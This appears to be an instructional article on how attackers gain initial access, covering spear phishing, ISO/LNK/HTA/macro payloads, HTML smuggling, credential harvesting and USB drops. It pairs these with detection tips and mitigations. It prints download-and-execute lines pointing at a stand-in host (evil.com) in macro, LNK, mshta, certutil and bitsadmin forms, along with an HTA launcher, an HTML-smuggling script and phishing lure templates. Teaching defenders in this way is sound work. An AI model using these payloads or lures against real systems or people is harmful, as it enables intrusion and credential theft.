Initial Access: Getting In
All the infrastructure in the world is worthless until you get code running on the target. Initial access is the moment everything becomes real—the transition from planning to operation.
The Critical Moment
Initial access is the hardest part of most operations. Everything after—persistence, lateral movement, exfiltration—assumes you've already achieved code execution on a target system.
90%+ of successful breaches start with phishing. Not zero-days. Not sophisticated exploits. Someone clicked something they shouldn't have clicked.
This is why attackers invest heavily in social engineering. Technical exploits are expensive, often patched quickly, and leave forensic evidence. A convincing email with a malicious attachment? That works every time, across every organization, forever.
Phishing: The Gateway
Phishing isn't just "Nigerian prince" emails. Modern phishing is targeted, researched, and nearly indistinguishable from legitimate communication.
Spear Phishing Components
ANATOMY OF A SPEAR PHISH:
1. RECONNAISSANCE
- LinkedIn: Job titles, reporting structure, recent changes
- Company news: Mergers, layoffs, new projects
- Social media: Personal interests, communication style
- Email format: firstname.lastname@company.com
2. PRETEXT DEVELOPMENT
- Why would this person expect this email?
- What would make them click without thinking?
- Time pressure: "Urgent", "Action Required", "Deadline"
- Authority: Appears from CEO, IT, HR, vendor
3. PAYLOAD SELECTION
- What will evade their email gateway?
- What will their system execute?
- What won't trigger antivirus?
4. DELIVERY TIMING
- Monday morning: Inbox overload, less scrutiny
- End of day: Tired, rushing to clear inbox
- After company announcements: Context for pretextEmail Lure Examples
┌─────────────────────────────────────────────────────────────────────────────┐
│ PHISHING PRETEXTS │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ AUTHORITY PRETEXTS URGENCY PRETEXTS │
│ ══════════════════ ════════════════ │
│ │
│ ┌─────────────────────┐ ┌─────────────────────┐ │
│ │ "From: CEO" │ │ "Invoice Past Due" │ │
│ │ Strategy document │ │ Account suspended │ │
│ │ for leadership │ │ unless action taken │ │
│ └─────────────────────┘ └─────────────────────┘ │
│ │
│ ┌─────────────────────┐ ┌─────────────────────┐ │
│ │ "From: IT Support" │ │ "Password Expiring" │ │
│ │ Security update │ │ Click to reset now │ │
│ │ required │ │ or lose access │ │
│ └─────────────────────┘ └─────────────────────┘ │
│ │
│ CURIOSITY PRETEXTS GREED PRETEXTS │
│ ══════════════════ ══════════════ │
│ │
│ ┌─────────────────────┐ ┌─────────────────────┐ │
│ │ "Salary Information"│ │ "Bonus Notification"│ │
│ │ Leaked document │ │ Tax refund waiting │ │
│ │ attached │ │ Gift card reward │ │
│ └─────────────────────┘ └─────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
- Check Reply-To vs From address mismatch
- Hover over links before clicking (check actual URL)
- External sender warnings on "internal" looking emails
- Unusual urgency + unusual request = red flag
- Attachment types: .iso, .img, .lnk, .hta are suspicious
Payload Formats: Getting Code to Execute
The email is just delivery. The payload is what actually runs. Attackers constantly evolve payload formats to bypass security controls.
ISO/IMG Files
Why they work: Windows auto-mounts ISO files as virtual drives. Contents bypass Mark-of-the-Web (MOTW), so Windows doesn't show security warnings.
ISO FILE ATTACK CHAIN:
1. Victim receives email with ISO attachment
└─► Email gateway may not scan inside ISO
2. User double-clicks ISO
└─► Windows mounts as virtual drive (D:\)
3. ISO contains:
├─► Legitimate-looking document icon (actually .lnk)
└─► Hidden folder with payload (beacon.exe)
4. User clicks "Document.lnk"
└─► LNK executes: powershell -ep bypass -w hidden -c "D:\payload\beacon.exe"
5. Beacon executes from mounted ISO
└─► No MOTW = No SmartScreen warningLNK (Shortcut) Files
Windows shortcuts can execute arbitrary commands. They look like documents but run code.
# LNK Target field (limited to 260 chars, but tricks exist)
C:\Windows\System32\cmd.exe /c powershell -ep bypass -w hidden -enc JABjAGwA...
# Icon can be set to look like Word/Excel/PDF
# Name can be "Q3_Financial_Report.pdf" (LNK extension hidden by default)HTA (HTML Application) Files
HTML files that run with full system permissions. Essentially HTML + VBScript/JScript that executes outside browser sandbox.
<html>
<head>
<script language="VBScript">
Sub RunPayload
Set shell = CreateObject("Wscript.Shell")
shell.Run "powershell -ep bypass -w hidden -enc JABjAGwA...", 0
self.close
End Sub
</script>
</head>
<body onload="RunPayload">
<!-- Can show fake "Loading document..." message -->
</body>
</html>Office Macros
Classic but still effective. VBA code embedded in Office documents.
' AutoOpen runs when document opens (if macros enabled)
Sub AutoOpen()
Dim shell As Object
Set shell = CreateObject("Wscript.Shell")
' Download and execute
shell.Run "powershell -ep bypass -w hidden -c ""IEX(New-Object Net.WebClient).DownloadString('http://evil.com/beacon.ps1')""", 0
End Sub
' Document_Open is alternative trigger
Sub Document_Open()
AutoOpen
End SubMicrosoft now blocks macros by default in documents from the internet. This pushed attackers toward ISO/LNK chains, OneNote files with embedded scripts, and other formats. The arms race continues.
Post-2022 Payload Techniques
With Office macros blocked by default, attackers evolved. These techniques emerged to bypass modern email gateways and endpoint protections.
HTML Smuggling
JavaScript constructs a malicious file inside the browser, bypassing network-level inspection. The payload doesn't exist on the wire—it's assembled client-side.
<!-- HTML Smuggling - File constructed in browser -->
<html>
<body>
<script>
// Base64 encoded payload (e.g., ISO, ZIP, or EXE)
var payload = "UEsDBBQAAAAIAG..."; // Truncated
// Decode and create blob
var bytes = atob(payload);
var data = new Uint8Array(bytes.length);
for (var i = 0; i < bytes.length; i++) {
data[i] = bytes.charCodeAt(i);
}
var blob = new Blob([data], {type: 'application/octet-stream'});
// Trigger download
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'Invoice_Q4_2024.iso';
a.click();
// Optional: Show convincing message
document.body.innerHTML = '<h2>Download starting...</h2>';
</script>
</body>
</html>- No file on the wire - Email gateway sees HTML, not malware
- JavaScript assembles payload - File materializes in browser
- Trusted context - Downloads appear from webmail domain
- MOTW bypass - Some smuggled files avoid Mark-of-the-Web
OneNote Attachments (.one files)
Before Microsoft's patch in 2023, OneNote allowed embedded file attachments that executed when clicked. This was heavily exploited when macro blocking rolled out.
ONENOTE ATTACK CHAIN (Pre-patch):
1. Create OneNote document with embedded attachment
└─► "Double-click to view document" button
2. Behind the button: embedded .hta, .bat, .vbs, or .exe
└─► Icon disguised as a normal "Open" button
3. User clicks, payload executes
└─► No macro warning, no Protected View
4. Beacon calls home
└─► Initial access achieved
NOTE: Microsoft patched this in March 2023 - embedded scripts
now blocked by default. But unpatched systems still vulnerable.Windows Shortcut (LNK) Evolution
LNK files evolved to use living-off-the-land techniques, avoiding dropping executables.
# Modern LNK targets - no dropped files
# Uses built-in Windows binaries (LOLBins)
# Target: PowerShell download cradle
C:\Windows\System32\cmd.exe /c powershell -w hidden -ep bypass -c "IEX(IWR('http://evil.com/beacon.ps1'))"
# Target: MSHTA executing remote HTA
C:\Windows\System32\mshta.exe http://evil.com/payload.hta
# Target: CertUtil for download + decode
C:\Windows\System32\cmd.exe /c certutil -urlcache -split -f http://evil.com/payload.b64 %temp%\p.b64 && certutil -decode %temp%\p.b64 %temp%\payload.exe && %temp%\payload.exe
# Target: BITSAdmin for download
C:\Windows\System32\cmd.exe /c bitsadmin /transfer job /download /priority high http://evil.com/payload.exe %temp%\payload.exe && %temp%\payload.exeZIP with Nested Archives
Nested ZIP files bypass scanners that only inspect the outer layer.
NESTED ARCHIVE TECHNIQUE:
invoice.zip # Outer layer - looks clean
└── documents/
└── Q4_Report.zip # Inner layer - contains payload
└── Q4_Report.lnk # Malicious shortcut
WHY IT WORKS:
• Many gateways only scan first layer
• Password-protected inner ZIPs block scanning entirely
• "invoice.zip" passes basic inspectionQR Code Phishing (Quishing)
QR codes bypass text-based email filters entirely. Scan with phone, payload delivered to personal device outside corporate controls.
QUISHING ATTACK FLOW:
1. Email: "Scan QR to access document"
└─► Corporate email gateway sees image, not URL
2. User scans with personal phone
└─► Bypasses corporate web proxy entirely
3. QR links to credential harvesting page
└─► Or mobile malware download
4. Captured creds used for corporate access
└─► MFA bypass: real-time proxy (evilginx2)Search Engine Optimization (SEO) Poisoning
Instead of phishing, poison search results. When targets search for common tools or documents, they find your malicious download links.
SEO POISONING FLOW:
1. Research target's likely searches
└─► "Company VPN client download"
└─► "Industry compliance template"
└─► "Quarterly report template"
2. Create convincing webpage ranking for those terms
└─► Compromised WordPress sites work well
└─► Or cheap domains with aggressive SEO
3. Page offers legitimate-looking download
└─► "VPN-Client-Setup.exe" (actually backdoored)
4. Target finds via organic search, downloads
└─► No phishing email to trace
└─► User trusts their own search results- HTML Smuggling: Monitor for Blob URLs, suspicious JS downloads
- OneNote: Block .one attachments at gateway (most orgs don't use)
- LNK files: Alert on LNK with suspicious target paths
- Nested ZIPs: Deep archive inspection, block password-protected
- Quishing: QR code detection in email images (emerging tools)
- SEO Poisoning: Endpoint monitoring for unsigned downloads
Credential Harvesting
Sometimes the goal isn't code execution—it's stealing credentials. Fake login pages capture usernames and passwords for later use.
CREDENTIAL HARVESTING FLOW:
1. Clone target login page (O365, VPN, internal app)
└─► Tools: evilginx2, gophish, modlishka
2. Register typosquat domain
└─► microsoft-login.com, 0ffice365.com, etc.
3. Send phishing email with link
└─► "Your session expired, please re-authenticate"
4. Victim enters credentials on fake page
└─► Credentials captured and logged
5. Redirect to real site
└─► Victim thinks they just logged in normally
6. (Advanced) Real-time proxy captures MFA tokens
└─► evilginx2 can capture session cookies post-MFA- Check URL carefully—typosquats are subtle
- Look for certificate warnings (though attackers use Let's Encrypt)
- If site asks for MFA after you already authenticated, investigate
- Use password managers—they won't autofill on wrong domains
- FIDO2/WebAuthn hardware keys prevent phishing entirely
Watering Hole Attacks
Instead of attacking the target directly, compromise a website they frequently visit.
WATERING HOLE FLOW:
1. Identify websites target organization visits
└─► Industry forums, vendor portals, local news
2. Compromise that website
└─► Exploit vulnerable CMS, steal admin credentials
3. Inject malicious JavaScript
└─► Only triggers for visitors from target IP range
4. JS fingerprints browser, serves exploit
└─► Or redirects to credential harvesting page
5. Target visits site during normal work
└─► Compromise happens through "trusted" sourcePhysical Access: USB Drops
Leave infected USB drives in parking lots, lobbies, or conference rooms. Human curiosity does the rest.
USB ATTACK VARIANTS:
1. STORAGE WITH PAYLOAD
└─► USB drive with autorun payload
└─► File named "Salary_Information.xlsx" (actually .exe)
2. RUBBER DUCKY / BAD USB
└─► Device presents as keyboard
└─► Types pre-programmed commands at 1000 WPM
└─► Opens PowerShell, downloads beacon, executes
3. USB KILLER (Destructive)
└─► Charges capacitors from USB power
└─► Discharges high voltage back into system
└─► Physical damage, not data theftComplete Attack Chain Example
┌─────────────────────────────────────────────────────────────────────────────┐ │ COMPLETE INITIAL ACCESS CHAIN │ ├─────────────────────────────────────────────────────────────────────────────┤ │ │ │ ┌──────────────────┐ │ │ │ 1. RECON │ LinkedIn: "John Smith, Accounts Payable Manager" │ │ │ │ Company: Processing vendor invoices │ │ └────────┬─────────┘ │ │ │ │ │ ▼ │ │ ┌──────────────────┐ │ │ │ 2. CRAFT EMAIL │ Subject: "URGENT: Invoice #7291 Payment Required" │ │ │ │ From: vendor-billing@acme-corp.com (spoofed) │ │ │ │ Attachment: Invoice_7291.iso │ │ └────────┬─────────┘ │ │ │ │ │ ▼ │ │ ┌──────────────────┐ │ │ │ 3. PAYLOAD │ ISO contains: │ │ │ │ ├── Invoice_Details.lnk (PDF icon) │ │ │ │ └── .hidden/ │ │ │ │ └── payload.exe (Cobalt Strike beacon) │ │ └────────┬─────────┘ │ │ │ │ │ ▼ │ │ ┌──────────────────┐ │ │ │ 4. EXECUTION │ User double-clicks ISO → Auto-mounts │ │ │ │ User clicks "Invoice_Details.lnk" │ │ │ │ LNK runs: powershell ... payload.exe │ │ └────────┬─────────┘ │ │ │ │ │ ▼ │ │ ┌──────────────────┐ │ │ │ 5. BEACON │ Payload executes, beacons to C2 │ │ │ │ Operator receives callback │ │ │ │ Initial foothold established │ │ └──────────────────┘ │ │ │ └─────────────────────────────────────────────────────────────────────────────┘
Detection Summary
| Technique | Indicators | Detection Method |
|---|---|---|
| Phishing Email | Spoofed headers, suspicious domains | Email gateway, DMARC/DKIM/SPF |
| ISO/IMG Files | Virtual drive mounts, LNK execution | Block at email gateway, EDR monitoring |
| LNK Files | Shortcut executing cmd/powershell | Sysmon Event ID 1, command line logging |
| HTA Files | mshta.exe spawning processes | Process lineage monitoring |
| Office Macros | WINWORD.EXE spawning powershell | Block macros, process monitoring |
| Credential Harvesting | Logins from unusual locations | Impossible travel alerts, URL filtering |
No technical control catches everything. Combine:
- Email filtering with attachment sandboxing
- Block dangerous file types at the gateway
- Disable macros for documents from internet
- User training with simulated phishing campaigns
- FIDO2/WebAuthn for phishing-resistant authentication